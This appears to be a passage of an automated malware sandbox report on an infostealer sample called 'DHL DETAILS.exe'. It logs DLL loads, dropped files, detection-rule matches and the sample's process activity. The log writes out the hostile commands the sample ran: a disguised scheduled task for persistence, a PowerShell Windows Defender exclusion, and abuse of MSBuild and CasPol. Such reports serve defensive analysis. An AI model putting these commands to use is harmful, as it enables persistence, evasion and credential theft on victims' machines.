                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: VHFSQv.exe, 00000020.00000002.2810375396.00000000013E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\AppData\Roaming\VHFSQv\<.sln10"(
                Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                Source: VHFSQv.exe, 00000018.00000002.2644557295.0000000001517000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\AppData\Roaming\VHFSQv\<.slntA
                Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                Source: VHFSQv.exe, 00000018.00000002.2665284282.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, VHFSQv.exe, 00000020.00000002.2814676821.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,C:\Users\user\AppData\Roaming\VHFSQv\*.sln
                Source: VHFSQv.exe, 00000018.00000002.2665284282.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp, VHFSQv.exe, 00000020.00000002.2814676821.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *.sln
                Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
                Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: /ignoreprojectextensions:.sln
                Source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@61/28@7/100
                Source: C:\Users\user\Desktop\DHL DETAILS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:48908:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess43312
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess56176
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:62308:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:63200:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:48136:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:43144:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess43080
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:43104:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:82140:120:WilError_03
                Source: C:\Users\user\Desktop\DHL DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp5A0E.tmpJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""
                Source: DHL DETAILS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL DETAILS.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\DHL DETAILS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: DHL DETAILS.exeReversingLabs: Detection: 52%
                Source: DHL DETAILS.exeVirustotal: Detection: 35%
                Source: C:\Users\user\Desktop\DHL DETAILS.exeFile read: C:\Users\user\Desktop\DHL DETAILS.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL DETAILS.exe C:\Users\user\Desktop\DHL DETAILS.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe "C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe"
                Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat""Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3 Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43312 -s 155960
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 56176 -ip 56176
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 56176 -s 44056
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 43080 -ip 43080
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 43080 -s 96472
                Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\DHL DETAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                Source: DHL DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL DETAILS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL DETAILS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Xml.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Drawing.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Configuration.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Net.Http.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1829.tmp.dmp.40.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Configuration.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Xml.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1829.tmp.dmp.40.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Core.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: mscorlib.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Net.Http.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Management.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Drawing.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: VHFSQv.exe, 00000018.00000000.2615101482.0000000000EB2000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Management.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: caspol.pdb source: VHFSQv.exe.16.dr
                Source: Binary string: System.Core.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Windows.Forms.pdbIL_STUB_PInvoke source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.ni.pdb source: WER1829.tmp.dmp.40.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER1829.tmp.dmp.40.dr
                Source: DHL DETAILS.exeStatic PE information: 0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_015869A9 push es; retf 0005h16_2_015869AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0158FC3C pushad ; iretd 16_2_0158FC3D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0675FCC7 push es; retf 16_2_0675FCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_06781EFF pushfd ; retf 0005h16_2_06781F0A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_06781F2F pushfd ; retf 0005h16_2_06781F3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0678A43E push 8B040040h; iretd 16_2_0678A443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_06781AC8 push ss; retf 5505h16_2_06781AD6

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\Desktop\DHL DETAILS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exeJump to dropped file
                Source: C:\Users\user\Desktop\DHL DETAILS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file

                Boot Survival

                barindex
